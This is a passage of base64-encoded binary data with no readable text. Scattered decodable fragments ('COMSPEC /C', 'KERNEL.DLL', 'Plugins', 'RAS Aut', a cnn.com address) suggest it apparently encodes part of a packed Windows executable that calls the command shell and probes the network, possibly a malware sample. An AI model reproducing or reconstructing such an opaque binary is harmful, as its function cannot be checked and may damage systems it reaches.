+DCSb7pi9IbzsRZnDSfDGRZGHlzVfBvQEn8OUEpqGsWoiPIWYVsiycA5hlpOYaJ/VOgc1JJZOAbKy +2duenzSY4Itt4CkW8WHtjFgKXIB9Qvxyuf0zgf6icQd+DTp1fQW+QJzdd3cBQEgtMA5yCS3PigYF +8Rf7heta6wFOagX1OA+FPUjEkM3N+qRPBQ0TtF6wSzDIJigqrelbVnwuuBFvUFM7Qthmgx1vf4H7 +Djh/Njue7VL1bA0LGCDrFhLbVbmfwev0GaByS88MzhZ7cwwaXkt0Zw8vEbDlG+kqhA8dZG0ti3i3 +ZxJ1B/0MqpFY7EeAGl+oHwuSl7zkYdxuCHB4yUte8nLUdlh6wPjYL3mGkI3o63kIkQTrcCNfLvU1 +0XgsWKFQBHXiRWSLTr38mZfFZ/Ggp2gEXMsoIUPyklw0XAiDA0a7BLxgxyQYGSykKifwW06sIAVs +hsd5hxcYsOYYXgAgjHV0Iazn+iBEb3duzCPPVC7qEaNakA/fLl5V7ALwiEX/6ehdVscw8GiIIyeh +DMcCEAFgcK14gI8wNRTGIIsdGAaK20O2al5Hg3F1CemA+7UHKOsHCNgfZrTbVUS5DCWLU2h2bJCt +NfBDEKBACQZ4tcVLBxNEAkhvoG5Hwwyt/wR1n7me2lg2IGYNpmF8mexsE5ANmKiK8ET7hbhoPwzH +qGZXdxkYaJeAQSPIaexz72RoEJIqEahPxoDZhgGtTK+1uOwMmAwWtewRDjs2troND0kQNgw2lg4j +xxxo/zIi4DqQwcNUl2BxkgtPyun5TFbvXZJIJH8T7LoC/34By94LABvc/u1VhWhXurQFnZGRkeDk +6Ow+NKCt+QL0yvz2Zy6SfEMNvPcZiSbLJlC8xvA3nACvoRJ/eG+NlfAwo4FEdNNvUK0IACpVL4v3 +K7pm/06F9nwoRjPbG8aYgnhj00DsGH8P30g72Gmjalq/xx9Da7snYyP671NeKGY9AYBtB3xoM1+q +w/hqD4+zKTP4ub0VeQ4zf1QKNwIufy2zNSBn/4EfCDaNbCNbSA9WBAg4E8mybZgRVFW5JjBs5W3Y +2ZUGvhtYOH8pzkZun87oNB8FAi4GVz7bZE+AAkk5K9LA+LssI98LGg+C9vsKeQMlPeZ2Bz29t39Y +bLlwfSUjt+e2H2tjfQMCVYYDkVm2YWcGnDZHkAyzk21snSc+IMbvBjbbc9gYBF7bJBH2Lb5k5NgR +I1sEKoQErUeejD0t3B36HQVABXvuoiDPDGhAuBGWnUsNk7ADFJRsIfkmHBEsPjRIyDj701hmKfm2 +As4SL0hkSiaSVGBsIpmSiXiEmUimZJCcqEomkim0wJmSiWTM2ORIpmQi8PyD5JGcCGkUaZELmZIg +LBSOVAP2qAF0Qjog/YvTrYrFCIQM4ugERXY2u7DVI4u5hU/QUSN8B7ItsBYhV+jolv1jJLnTg+ow +MdmVsMD0NjgjTsiUTUQRUGhcdh0o4A4IaKjob4D3G4kctQ9oaBoygRAQc4x0lE0kU4CMLzIlE8mY +pLCRTMlEvDiOLJQwyDMv1MmRhRJRL+BTMpFM7PgEfAN2kGrrfCwPGhAkk3yTYSkcUiZ5DnloaTco +KOSb7Eg0Gg0OQC8L/DEfDHRE2vwFcjywvC1vDAZ0N/oHDXIvslhEjDbmcicu8pMtXotYDPOEpQ4r +0HQL2BlDSQNxiRN1IM/4uC9eUIrlbWU0UKDchB4ZqusUjdGLSLsKvbgKXHHiJH6FjkSczd1wAIzQ +SiTgQMEO+jMdsQzeJghsClOxj3olejgJCVShWMFqYUgLGJKXBShqB3uAjaQOPUg+YBKGHAgSNxlC +YI3+Qjz9tjCAQFEn9AVLgX38vCB0e9jxfj9iTShYav50AQ+I/+X08yQ4g/QxQDDgNljEbNr/LKHc +HUNoMotA4YlOtiMOBYRTECQO0zwsIF39Z9yRBGBJBX2/XHISW9sGe1VORE8w+kmIfbd7VEFCfR/k +yQwRRxtERUwGZMAOKQswIYB8KyNrC0DIgAzIMiMzDMiADCQ0JYAMyIA1XsiADMg2JjcMyIAMKjgo +gAzIgDktXkYMyC4vi3tGgB0ISSs6C8iADMg7Kz3YBUYMPD9fCwzIgAw+P36ADMiAYHvOgAzIW3xc +4JIrI8MiJ0DhtzIjCzEyvdWrJE3DBU1BsgPZJJhtbg0DHtYkJhwNdBLdgz2kGixpxWQmECDLYFsq +GgoUDy+V4dEYrHpMopyEDQ4jLk4C8BylNc3HcmtvdSWhnIAbMgIZ4AmxwwDn2e0CBM2wStZ4JAgc +O6t0cxUHUgQfMFsyN5Lklw6DBxt7ikcNJgmAELrPCsWTvKOg5y/AEFw0YAI6P3CtIhLBg/EfzPV6 +X2HMMjhFR1hCLpnc+CFksLJhNrcgrCx9zSQnXAEUTQ4EOwCxEy48ZJGJFqrr7JvobAQvYLZ8ZYGF +iOgsg8UuWzzshOwTN+RLBpt09ywp/C6kO5Dk4PPc3AcyycNdDG7g2EsO+zRkSQgqHECzx5LYdAH2 +HmBudSfUeRE5d1STYM7RJ9yLPBARlvAVMrcsGY99k1YgzCbM6yFNYHyqWESS/EgBUzzRAMdoNbFB +S8gjWngOCOTmIa+fbdi6Ckng9esEs0lQtpPYdwb7UG9ydF8fBhAqD3YO2A91c2VyKj9pcC+Q+ZBc +cHBhc3MJ0Ltda8lRAFOLHewljI8U5JRvJYsDi1NgkE6SORM1BgGNek9LGvknqeoOJOEYh+iLdBba +PliQb/n4uqhvIv9wCGgkRrLxE5X0tMiOTLYrDP8zF7KFpPMQaGs/8HkJE0cU+eH8ug6BOCkmaLo3 +PGBYU9cxi+JqwBt2WKmFCRAIOIZlDPY5kC4AEvuciDfJXj6bj/sZTCIk+5tvGmjGYYfRW9jINskH +S65x0g2JBsX+yzIig/sgdSShgIa6gEGDdeTwDduF+1roCEvweQCk3D3T5BbSewUsC/rtgY0XUEhk +g9xAD45EAcPsLMTiiKQ2iKAkFC/HIhixYTC4i83EcbP5Pjx3hhqOQ7sJDHyZgBOAInWdgFvpBoKZ +de3oOkWDCAYQVraQfTO6BxwxERSpoPBIM9sFgAkVy1sEAnQMBBjIc/v2R3xDDAd15OmYYXvQkGc7 +dHXRvQEEZ9GkmvTz1Nhuku8JUetDPtw0/EMeGhmY6PhhHAiT+E1sBYdELOvrCho1tSRCWJNxFWvJ +k0Q7OQCDNTU1jISMPDY2NQo5OJAH8mx9LX0WyLsKwywz4NoM6wUuG4G3Ggh1HT6YwRxkxwejfQGJ +UQRNzwqhYsmpQAQpQxiEce4DSIpqKWIYzmYgYqtS4YNzwJopDghsoXQNcG0z6nhT3LoZf3pr0wgs +GA+Hhllut+9x/ySF/HLxe3wDtXX4e9lvtil2DwNXewsvdwe7sLc5rFF4CwN0E29vdgDqekMDc3V/ +J1IYaAUCT9L7uTy3COEIEiwDOHR0BMv2AWgL5mx3IH2H8dssIxNgLQrSdy0yYm47pBF/BSiomnQc +hvCgqLAlxQ6kiyxAca4Q2WDxUD0lyRTSyNu4vpxO0eHhUcYFtQHGH/COPHCF6FDMOcg6LIbsg+kD +3uiiCNIHvk9xWb4DHz3Jg8fkQeDQy/44jY7A3BEHIvQDxovWycyShnhgaIR9SPiLbZVtRkAEGLr5 +ni7hwDgAqix5AvEDwUhb9IoSSU42Hh6k4PBFti6wGJXrksZ0eJHNnpT0I7oM+QYzGazcpwRIbqcm +vhCH/3+QL3RCvAhV2KFUA4wgnxjYT5B9QjE7gbz/f6UgB0s0YwaVc8Mkog2C84iLFZCazhILnP2e +0+ASI2RTMWWL8DbU24DCQQgP1GKw3ZLMDLqchKiDbAckJSRg7dDQkLMPCZX+GnWU8xgl9DgsC72v +QhaevSn7qMQKyONhMXNVyIDUqwzh0dXRxYAEhWl/g1PCSvqOYAUSBb7INiW8GYcIM/XEf1tz8IhQ +AeKChUVCCSS6Qb57jKB2wLECjQj0jVXAe2sJr3zZDjQDdQgSINyiw4vvdZqzT5Mf1PAhrH0kBOGQ +DRmJ9CLQQjOIIV3CLmy2D/GeUPnmpqwUfRH2Ab1jCbq4PQMcEERsgDdQBRx4BTEWg4C/8BkSIoEM +8liovDIy2AasxoTHuIQHkaUVRLhdC5sRZGwD9TiKkLVw3Y/+m3HZsxK4xF5JJbtDlnAB+vp96dcw +iCvJ1bncKmC8YAxcFFyTURzi6zO8PPARiA1gb9A3odgRgn0QNH0BoVgLiteWgKkMOQvIYBSxGKcC +u7CKN0A0cPA84nLjHYkwBqf+/7gCGKmK8OhVVVZEsw2cZKIDUGi2gJ5ftiVoQB0fXEisBJ0wxsKs +3DRyHAMBEwp9xQbjKZfwF7hEdkJrAUpenzsfy9x3/3UKOwEPgiiP6wYPjCAHgOAGEHPfDCsQu9sQ +VnY9hIBmtC1hYQl+67QFhvWVHzrJAYj8RgICCYRgtTIhbQiqxGg9hCVUs1UigggGEGGjd37JeFiO +VlsYDg4k6KGQvAReBAFBLNYWfhh1LmoF3n5fBDp+gGuVXA2qLewQ9JYQjzIXdQdChavgzBBqRFmr +2dYzY9QSMIDFAjdQUAJrFBvWZcSBrQfG/SRww7BZgcFDBrDrJlzbbyNpONosf1p0ewYRuuXnQpWT +AJ2SfB6n/dkbWMgHAxMLf0YrWyMPfw50GYPbrv/263V0FAQIdA/rLoHreC90BQ5vZYJVxnUhPcuB +ek4ko3N9sLkDBOoByLoJ08WRnATT0f/FIS9nPwMwNDQ6Jc8rLoABOlssQS57yf/+AAt1YP9EmAo+ +eC5waWZfeAODODE30wANCZ6JYAfnIMXJygAoYoCuS75KNj0NDR9WL6wKNQ5BCA+rFyDPDAFACBBa +V2E1C/Cyc1nqpS8rdBc9Za4AYh251GMr0ABv9XjAA6sn3XYZcEPea4U87AJ41vbe5iDcpDDkrAdk +NxYMRCfQ71QDSO9sMW3wzRRCsRgy8CSd0SidLJB1fNCN2bZBdoKsrAwTaAUIT3aWYmK0BDe4600q +zTZCYOwaFIp4C1EQZIzolhwZnizM6Gh4pvDyDELBtVrkBaWg7R9Og+4Ccg0EKKy1FdLH7sg5Ig7P +7oBHIA9pgLPkugcgXbBCz/+EPDAesYJsjILSLENyCBAUsWhEcgQQcwt4oflIdBztqgDuyTLG229h +4XJUMvEy6K2AYmF1OrW2hJ/C/YYlqGjI1wb/cBE/ZPVgaNSCies1ofgCC8aJZH3hOELYB33Q7hP/ +DSeBd5oa9PTckMmOSQb0cmSuTEZCRr4/YlxxxbIkHwi4AsMkWgz4uesrC2C3IfEe5xTNIeWBTGR8 +UAhLThBRIiEeuIICSgi0ZG8ATwN5ZM3LzDSGMiRHyA+GDBiSIZDNHNQCGPu58YP4Y38eWQkBB3Qo +BPBk2XgRdE5jSrJ1y/txohYVuIGoARTdnUEHoTz6IJGY0EAbyJFPoyYIPAMq1kWRoqR9JqwMYgnE +bsA4BGvmarQpjCZHWnMYfkh+Y6w0mGhMhkNPdd1qlpwEzTpUxItABsRsaXTIDeKR7x8k8LDBeC5O +CJdQQ6msnkXmWIb5JCwCyFiGt4jsHljmJhhkwlgcsoUQXhPoGSCHLIPo5C4wyCHL5OBD4LxAOCFx +62IKuwHVd88XxRQEpoB8GP8xIVS3opO+dRyAwpSEKvKO8Lb9sdDEOMYHbkM4FS4FdcJpedsozzEK +BBF0BVeC9AhkIhg7hkBHyV2b4LoIDZCSamHb/4Q8kCfleIpGitksQ3IQICSFAxQoGQIgLBEvvYUs +fRFnKnQuoXOtCsGPegmDwNRp5t0inoizmNMRcg6jYMi2BC4hHpLJGbERAgML6J6wuoT6BRAqdTSq ++BEGqQfHbAzSNHAYzdvkIFtbcha45GY4YaQHe8h1D81AE2B1VCkGSwb89LiQivzk9KWkF5AnICfO +dQCYINOHbEFeMsjMvF/MRFuVuYVeicxYcCCku8IOnEH4IPxyyKK3QWCoimGQrmI67OxRYX0k2z/8 +g8ICHMVSoyBWbDdS4dxdY+C5tCYurVPxhnXgNBCow4u8hB/KhBvlsmaC24luagSEBSSIQTaxgq/s +JESov9hhkDl4IAAPVJN8SH0QuARx5RLAIf84XpX4ZEgOjC8h3Nzo9Qk0kAHrL38bDVbQvjwg89gf +xJUsZNj5lCAHWf/wg8PWg+sCczYgAcaqR3+K0gULBCNkIN4MaIF0I/6XSBfABzIwNgArNAVPBV/Y +uQbDjBQhaHtrmEAxkhyQXfrvlZyVliG5sH4UKCwWDYFsXAoo4iKrEHX4GoNFRyoeKg+PgSkF2d5G +3r4pD4eWu14AB40DZyvkySF2jkqVTbZssLAfuic31ZpmO5A7A48DoLK8b3KQQdgVkD92N+m6Swd8 +A4i3Nn9Fwshle+C3BjPVxQrQCNNsm+2BjCH5N5EDcpVsuy9I0XHyB7qSA/DZFribSWV9I283TJ+Y +k5OtSAa9yvG5Adp2V4VGZpusgtoAu2zPrRd7WALxFAKqBwsEDHbkrXYCMb6BDPI8fT0HRziPkvh0 +LYP+kMboW554geNHCUaS/rBfpqLPHmvzFSpEMPw1BZJi42vTFVYU/RwYAIMt66YUiiWO3UQy/FOL +8+Nkfu9DbvXcUFdrxhUmOwL8RLILKftOHFFO9hLxTAL0K4N8rKWsEIY7mDFuLwku/EGFou2L1++s +p+8k3BiNlYhlxoeFDNawT9aKADlaiFACC5Qm3sTZMLrDRnQNSHRiH/gGqA3GF+savgyzE76/WJ+/ +BgYMvgUFvqhZwIC0JexiOQm5eLL+Cbf/EJ0ARoH+oIYQde//mk6W4vsVNAVW0VzhW0ITpvYFJ/v5 +RLA1JIT2jYCv7G5RpLIByM8QDxLvhUHyi5UrioDR+QI+fOJ0BkAsGCkkCR47GELPVDWB++Rz1m0L +lK3rpAQFAX+iyPfJeIpV6ycQK4YwkNkB0fB7YN/mIECKRTfY0GJjIYMCIVWWWQghuGELESAgMtIt +WCQBI2xj24J9CfVCUDsQ34PYJfg1+RNAoi+gTQhFvFTAi5plW/hABsTAyBxb1iKfMMBPC6+yTYZk +KQi4GFO1sFW+eewcyOYMBFDnhCSCXbLVZoRYi2xFPCEx0fjg0Blfwg7JDmjYfBD82IG4VtecTnX2 +IPiaZlm7KKwC9yLJw480lgg6hxJYMDUicABn432bBcJYdKAXMh4zWBgZhCHPOECWuy+AyMMAHQhm +M9sDGVu3PUh9FGwfWmgQcPS3/Q7SFH8F/7UVaFhbGZ3NJTFswyOCF5hnbGgutiVblTv25DhoQWwg +ZRQQD1oKnuXQsUbkz4XZhsW4BdqFZIX0JoPdKBJ32QyyoVCxpCx8Akx2yeYocgIUVriHDMlgZzRs +gCy9QDIPagPkYOiScIRgi0UUQj4v+YUQwAP47FZAJmRISFAJggANXF99s4pYlA2AGqSBBHx1/Gcs +BhDTvv29KB7kR/mQlohF47yExRfuik3jSXVEIEs1FOjjV2QsbDQgjty/r4xWNiKGyawRgIwMyJCo +lIwMyMimmK6cDMjIgLCgsoONEDvhOwwo3vgs2QIIddP45LA6AlyLzjT4CaH3no1WATsTXIFIw4JQ +fdGL5rCIZ48gMgKZ7MhlDgTrHh8I/EuRCxB4Mn8PdBpLg7AtW7RybRcvBjkk5S4EVsPUE1WAHoFM +KPaVijCkadpcDJ+YTkYx7+kajIMZQIpHDD29gPJLNP1CdXR0byWi/SZ9Q2xvY2tXBfWeBPBjD05v +dGlmkzEAiyawAEdPOz4s4j9DT01TUEVDWyAvQ2BhFa3bn4r/7QnnRAJfRGVmVmlldwBBCWCko2fY +kFdyZDcHopwkNYQcfZwYuEBuwTIwNDeEBaMPSi4wM38gcBJ1UnByAe8A44aNFzW8ARM1gBpjX9SM +QwvUIkcfJwWxLf0SFT8BlnVyYAwA1CPIJ2AjU+g9uJy8b4tSEYi4xCMCZicHx+A0LRk7QjnkVdDY +pmJhIrv4A1OMXCEH0ODcGKQghSrIiP54kHf36b5smff+2LNE0Mu0A0AbhN2fBwgEi9GLwUKanCcM +We9UCoEsTQFnAA1ziF34NUkEI9cg94BvRrQVHhOOIJi7PWsuI2r/AWixRyw6hhAcyKg4wsFWwsgc +rJYACKOE8LGfARAWyfiNSADOjfS79AH8FPkCNuHUsDslFQ8b2HfYaLHvkCzbGtQw1GiKJ99I0aFY +TNwLKOgw+Jw8cPQ4A9t1VjHkDCZYg3yBapYB/LoAnQgZLBgA0SEQOZALGfDwFDmQCxn09BgrMJl7 +EaEEvyN0fRA3A2AWJRZGK4pcyOzsJaRqBa4MFsaJyGONJtC8FsyhMBX9Nh/MaCRoMARAndK9N7Jd +kEwLkgtYUHGrSMtknZ18j40kcAfwaHw0BIiAlnqPE/RolGliUJbVKc6gLCG5vuzL3iLIaKBTIGis +DCRouEu+5EsoaMQ4aNAazmOFNMVr7GjoriRk1QZD4Bs/bg6BHDCpnMi6DlkesUozILms6AL9k/wG +u0Au+/pTA4Mgk314IBf51wzYgfwyLjA3+Av3gAzIgPb1yIAMyPTz8gzIgAzx8O+ADMiA7u25ZJLo +7ACP6+ogJ4kpUVjLoIbkCHmmoBw4MgSyWTxUAjgssTtQPeQefxk3LGrbmsoTIQR/DXgONPcx/pBh +LeUfD7DUWLElUFYStPSUAyIkvIxyCTUkvPD4Q2gJoUh3UMnqS4eUBxVo5KDsaNYAlRwd/yZWpVqV +8NFJ0JVMSXQHzTjqAXmyVypo+GgEoQLZlh14g1zgOUCGZNzcP0AO5ADY2DCAIZnU1FVSJxfgKYGz +RDw/BNgi2hkFQhN5L7QmGxxFuB2uC4HDkFG3xi38iwoDc5a5OQQyONKg1LoLjIzRCIsIc2U9clEM +jzNpGcA3Agv+LxQIeSAn76LKogtYhuQgQESLoGQIZGNA+Ag66hOjL/uZMmAcAx6SjfQEILYsIAsg +IibkpBMgkoUR/MW20aG0BN4kkxG81d5AbMtCLBf/RAhXQMcYxr856wJ+NbgIRiu05A3IyCBEQCAA +G4iTKrhLmyp1dAQykC1AolEIY1JaI1BwIiowBRAK/o6bizVehNt27/BUdfaLBgdD/wQF5S4RCXXg +Og1okpczc6MoMra9Q8V1FDRs0xwJyEMgGpV6o/7v/g6DLTIBw4gVDghUUGx1Z2lucxXCALMKucl9 +792HGcCoHxECLjLGFUjkZPuDBwVGdW5jeh/INYyQkyPoOHgQPRHL9AjJPcKoc7/YqhYJckzy5KT2 +aLAEC6km0JL4GAHApN0L21VWEsTPKEZWi8d+9OYZjrnXGHwHjUSw6l8Zdc3L4Y1TAbkQJ1EbFJC3 +uATkYQRLbqcy66TR02CJ79jo2kGQFwbF7KVCT4pSjlaUi2+TULytMg9y5i1tpnrjnIv4Dix1DlIr +V/L3vfwSdOt8LXUMOFcjpOtrqFMH8i51HmiSa2OPPQUPfOtIToyIT5zoi6Av9gQAsAgMBeL7ZDNc +2AH/XFD//D6LYGR6LaxXBWxWycMoiALzpb7qQEgHUFCBm3shFoDwdUh19uQMFE0EJoL1+vkc5jmy +tbYJBRgUtRBu+JAPKcOnxkX/zLgiQcl2bguYIClrBywKDgUboAT3AjRHsqlcElHseo6nEt0CGFx1 +Ch2DSrjNEJeRe5BP5PgwgDplaLQlitIE+7fLCSrxsDD1hIu7ILvNvXsPjJfGRo2d8CAmGKSLEwTF +vncfDaSNlQyNw2yu0ftp/7UKyXsoFHnI5ftT/BhMFLWVECRbJOJDxRgQXVZEhBFIlT72newP7Bko +c1zxg8MkTiCDgw0FcGIge9ibJPmVRS8InCrZIBwWzGyh3y1JRC8yyn4gR0JBbMva2CEhJrSKZthL +5MkJEIsQHKkGiMYWdxTMiw8Q5QJYsC2RuFRjBCzrCefwOmDbPf4NCN7nnCGwRJVOL6BCAtKnJ7Ny +x9nTtsRTH+OOL0sqeLhcFotN/B8kGwmcE3qYSObY2RJ4FiENBRVYd7KFBHstyKEje1lCgnscaDDV +doZqmXi6dro8Dulg5hVQTfz8sSTqQcAkQYZAIvkAMiOpKgQdGHswH1BwkcZLvC1yYUYl+bBnCGRT +qupQT5b4D3QMSJ+umig2ig/IBTqwZqAfe+v7s1MNiGb8gAAKoGiZzH5jrZP/kDkHmNINtIRkwe4t +umyq1dN7NmNblDkFLqi5kEPKluAoei6qz5bdTKifI1A1miYA3vJGBFMgujK4BCeIxyFjL77ISShj +vNg2WqpAHB4Dw442ES/0YGdDaGGEc2VzXwjaTH0HdOJlZCBibXsmoXmXDnIfcB4MUkT7ZHMgaGUK +H6wt4eDW6nC/VIWIJBMoMBDAkeLus0R0KaE0y/frufkWojEk+SwwEO3dMyom2AyjlBfH9/gpggeY +RwRAOBGt7u/2iUcQDhwC8eisQA4kdOy7Pbx/Zg6gDhhXCMBVdjN3eivDUFV7Ow267L92Auo0uRE5 +kCijQ3iXmZAgoQ5x1rfGtkEIrBYZzWhEECDgZYh4vz5o8AT3dgD7FUGjmEBqEjnIXUdsSFpQQAQQ +AEm7NhecaOBEavwct+HUYg7tPFxQJcFh5vOAo6D4rAEByMnfkHH0j3ijpKRkwALSMH4UnMugXZYK +4KO8w8v+ZsYW8GrsDHANkCRrHNhQEuiVDORCuErzKaAMrRSb8dxyENAbjIiNlNU3VJX07xUQDwBF +ZGl0GnTjH69vdXJpYSBOhvZBT57PBdzdp1Rl6HUNfyTgo4gjG2QOoQnRUTUhL/0Kucs+FrZQUP/T +Gjhp9KWovwBLRVJORUwXRExMAH3b1UgvaYFyUwJ2aWNlyChmRIajTEOeVXXgrk864MAMaF2LCFdI +0sMMagfA9S98bCwKHAQdJLBqCSeTDLL49AhYQKhkQPYsWKR2RD8IrywdyyATMgPw7ATq8IQ8Bey4 +TJoyIduQ8WPo/CwhIw/oaBTkHZBBBjnk4AWgVsKe4LhIY12LCAJRp6WrkVggD+euGBB0//BISG1t +d2RkTU15AACkI2Ilt986yvZAGbjYuAK8ykAD6AjEw+cvrMAda8dYo7Gq7GAJu/LsISK3MIwTy7wd +wqmes8Y5yOIOhNjhW3qhSfJEdgghuwQXhAcXp2bPEm+4yGVGaFHwQXbLOosVvbEroR7ECXsO4NRI +WBZAZUnqCvSEJwhTdqpYPbsSSMSXigV9zIsGDeH2TdUHUsYES3Xu/tQ7lUrNTHEPj4QLJeSSZdkT +0NzoFACzLN8bzNjM2CwBn1pMNBwSoWnIfHBZAMTUsdlEr1kvge1VxAceYIRiWBx7wAkSwgQiCEmC +G/1kwDvefmM9Vbwilmwzw0m80mHF7hS4uehwcexiALusybiEQJVDIgb2yoS/HEk1IM2qsbjkwCyY +kEhP0NdUVxKxEy9kwPiQn1RpbWXTACGrPzqoDNmL8vnkFlzGjrK7uLJEAMVve+3HDgsG5EZmiQgY +ql38qFDCzloWE4AFgPjqEsRmRXQdp6jJcrAxYmAII+CsCiEnoXGVsoJMbLOjrVHvIH4SMf3vBLkw +s0gChdsWTAQhUUFIIO24l0DQBUbxaHQutkDxFSrctBYZAj4gB4h0BLMBG7Ex2BfbccwVzsOkCgMF +gPOYxRIcTG+jU8MHI8yqJ2MnN0CBt/hvZnR31WVcTeWNon+343MNXFJBUyBBdXQNd5uj6GFsXCcX +bIx0cDoH9vbtLy93AC5jbm4Db20vE20yCLNhPRm36InqJKqu7LFFjibBp28hH0IYHtaWtOsHS4Jh +v353SKAtJMFiJOwSQIxmHVzkj/dkCQLn+APTFJAkqllZL2+Q4KFO43e4zHsJBpvGFnSli+sKD7kJ +K+r8E52kwELgA0WrRbXDIYIU5G8DKMkhY/hTteu0A0YHo4YLfJfyCdEOkLRbHPuGqkOLIbxloHtC +EBwLcAjGQ5XBPSgbGmcRnSaKD6R2Rra325UJBaisk0jye12+DZhxth4D6gvpUFu5iLaoYssqWxK4 +QLhJSyhcM1X0AbHtgEJ1BAXwQP1BLImn/42V3CHch3SMBAa6lElej52kG2MNoFX2cBB0JwNq11Ew +rBf/NmqAWJI4AzwPkBzYD13rJSakGOxFvA/bxYsQLOLbeVOqMFMZETNsy19AE+VAtTA3eE1LEmjS +kdbg34O8Cl52XCoLLi6PkxEW8i6LnMj2WlS2CQWgI87IyKikrMhCTsIAonK47BEKGbgm7gjBUsKm +FW3B8Yg9uzCLCmD/xLkTCtxrNZbcBEdd0hGghFLM5GSE3Ql2Kqi4oP2R4oUPYqas606LFnNfgiF/ +YkD/NUDyPapDcy9ouAaUOv1mQQTy5RBoxGHIQ80bAmoH+/mu5AoGeVuFZMGBwdz4rqVCmHHbAP/0 +iFZS53djz0OOo9T82PzUBdy8gdQ62KbgjglDfgPFupMKPJDNk6zc/Ny63PyIUDSVtG/wgAvZB9id +wPkO6QY86LqnaA700juqJlnYdFP2w7iGFyGIztjp8A6xYsmaogyeDw0Df0rB1PzMq+Z+SxBoDBvN +OjKEPAy+rFLyKbZIdhi/4Py8RkAe4PxREUbMRkbkFMkU/BhcBiOZiQUsI0oqck3nMAWBPrCq3mwR +iR2EfjVR4BKHBksj4LCQz0nMutT8kCErEnZT2COV8TcsKi4qU0d1CHMCePrRVSzZVdqjvN8ZG8wO +Bovki5cevvsXBD3sOxXQynUkOwXM7G0I+wccLIz06yC7GRkbG3vDmQMrEzmJC4nmZOsexoV5iTAG +enuOGSYKc10PzkO2n/uKAIiFfBUKQAELfWaWQ5YCfgN/iUZu4am6U02ADLisizHMhMn493GFiLHH +hjuodRA7tnXI2F8Jz6p8HIsji3uxgxwcFMcbAAlI9xZk0HODwwdyeRLYIcGQmustgJWcJLeqvOSV +MAl/n0O+GZKRIzQ42GFlSwbULJ+RkZEh1NjUuSBkktgyiJCFZSuFnzgH8oVkNCOLHJBJHiaf1NhY +WUImmC3kQMhJn0q+478ZkpEjPEDgaWVLBtwsP5GRkSHc4NwIEIaQ4DKfFpat5IyFn0DIF5JBPCOL +JnmYHByf3OBlCZlAoC0DISdhn+q/nEhGjpDBTFCVLRlk8OwsRkaGpD/s8Oybe0pG8IA9szxSCUBO +OEhI6wexNSE7kCOUeJcLySALsVBMI4VBDuSLIxuD4R1kkuzwxgXFuFaWkCGwNIQQchK4o8G3I0fI +ATvDVFiWDDIk+PQjQ9LKLFf0+HIkIyP0+DWVHAFyMZgyyMKyhaVYVJMD+UIjixwTyCRPV/T4uCSt +LCEtV4RwIORCw9vEn5NDMnJkaAgjlbCyyQQjLJ9wxsa+KxM5iQuJW8lFYZeghSSDLCyfaGQwOZAv +I4scHCAP+Z8EIwgjyJOwsoQtn+JHyIGQxHvGbAwyJCNwEAxDwsqWLJ8MISMjIxAMECxbyVGkhS8k +gyyfcGwj8jA5kIscnwwSMoFMENBITsLKLZ+CxhMkhJioTaUBnplkEMeoHIQMUIAJ6Nw9ZYm6AYTo +/3S4yPDagwCe6w7HB4TE2GFQWOg6ILKt5GEkF8c7ixMUs4IjL1QkGbKXo0bFC2RoMWRGxY1aNhxQ +Tc2gD1+4WCR0VCRq0AByGf/HWSZ5KDIPm8jM4BO6Z/AF0D6/uCMoHHKkqlbJ2w581EEg1ytY1MfX +BQ8E2Ci7lQkB3feoxB54tseXwF5JzENTFqZwAwM2QPjuEiH5fIBGbMm6oOyCzxLprXQxlHjJvCRP +F43Q3BBLItgVCJj8GimKvbBYVvCN/+deCxjQ6j0WADmSwVnIyJMEQ0IDmCQFeGFQsP8Xt13JVQyS +juTIEMyChbO/PAloZaMah8oOEQiCmciqbh8Ij0iFiYy1BGfD4RfUyPxoQ/AO2SFfFIoXqEMdebEb +oMq+c2RBJfhlTqCQbEku7JMT6rAz+CHsizEEglOnPQ1AIk5CEyVQg4JZeBv/pP9N8D5WM2KSwE2O +Z7z0piw6MhTj4/+2yQdRn/j0+jpkQxT3uyHLx3+BYAyZ2DF8OYpEH//F2UP0OgZ1JzHGGcgB25tB +6dFA1o1B+xgnCold/LIOS3lO1gabxxAoy/ikRxQhsoMNWe0wsYgTp100iZaRNYd+h9gm0SO7YpkY +UrWTBYBYG/xUEpKobRWn4p0VboBAPK7LuoGXsCIJD+GCeMgJ5DbMLr9cOOCG/Y1NBL8sGnMWhHks +bzcV4YPCII04/0fXFsgjOySOPcwROIrmj4mLVKFgbsABUKVtVjCieDrjs7GRrzMQsRAcBayRkZEY +FCQgz5DfZGQoLNczzzv5bESqsDD+oQ//ohPAstcjoeQhiPefVPnB4Ao72H0SKyOWfcbLyOsQEd1U +9f4djY1qsgGhEEpshtn3XJURuA8GdRDIISmWAzD+2sAmCzQgmQuoZlTNlXSgbWAfiHQiqBR92YIG +JCtwqYEUPZh9EAB+J0hI9kFEaLccsYsKJ3ygGFe/CRq4YRuGwEjPHw91DDwhVISnII1l9tzTQLJX +MSRUOhVe0NkjICnIEnC8gSIXAjWWuYbB3h6iTDZvCK0k6LiAYM8H2DoL8bQPmSKI3bmXtQFodB1C +UGiAdlvAiv4MunwgRZYYC/mMPZQfFAAhy4BifBSNTcqg1yy8jQ8NeKEEaAsEJ4c+GM9nQy5ZPhAQ +kQDkeU4C3DrPEAiy4kEjv1NOBnQ5An4xe2tlDtgXqiRsb2cAHzopsFVJAKtPXyEQNRE/X9dPTEZi +5+xPah08jKooKiOQDYRfQz6Zvhl00Mn432EsXvWNA1ktePEENhRcdHTSvEABe3TABBgxI95UcEcq +S4s79DBHM/bEA+cohIhNIJY4smHvBHYwg3v/3WdtLogOg0yDDAJGT3XTbU6Esw45AHANaE+DcJib +e6Qc4EDv1KEkAOMzpJrEQ6QQd3O2w7IY6OcKBehhRkZG8PT4EAd5EnMh0rMBiJ2qeMPhCbqxh0Yx +FJT4D3DvF8zG38MLi/gGSDv4nfGRzdHc8X//aGQuDRs7C7HIDAr+ETAMgegdavjaEh5QM54tjxUk +dL8ENtbFnjn0LBW6PEe2waLSA3Yn8H//+sJ7IIO9FcJX/zVEP9PKxoTsJAkVaEzTrWRzTG3oIOgw +kILNWLhESoBZsmX3PBxqSC6je+gHgEQLpLtLRezB6mjYFyaIoQpV8CCQQyefhegs/zS3DGMge1hR +/2RlbCAiJXMil9j9HOfMV1SU/Q0Fpt7ISODk6B+gogM0yRHUCm8UwKzwhRUflkERi3ss8iafEwIa ++xzUt3oD2TPkDPLwAhqeYVjujxGqwsweFljEbgxcLDwShShcZR5dvD9F7qFkFFrrLoM9ITqCxy7O 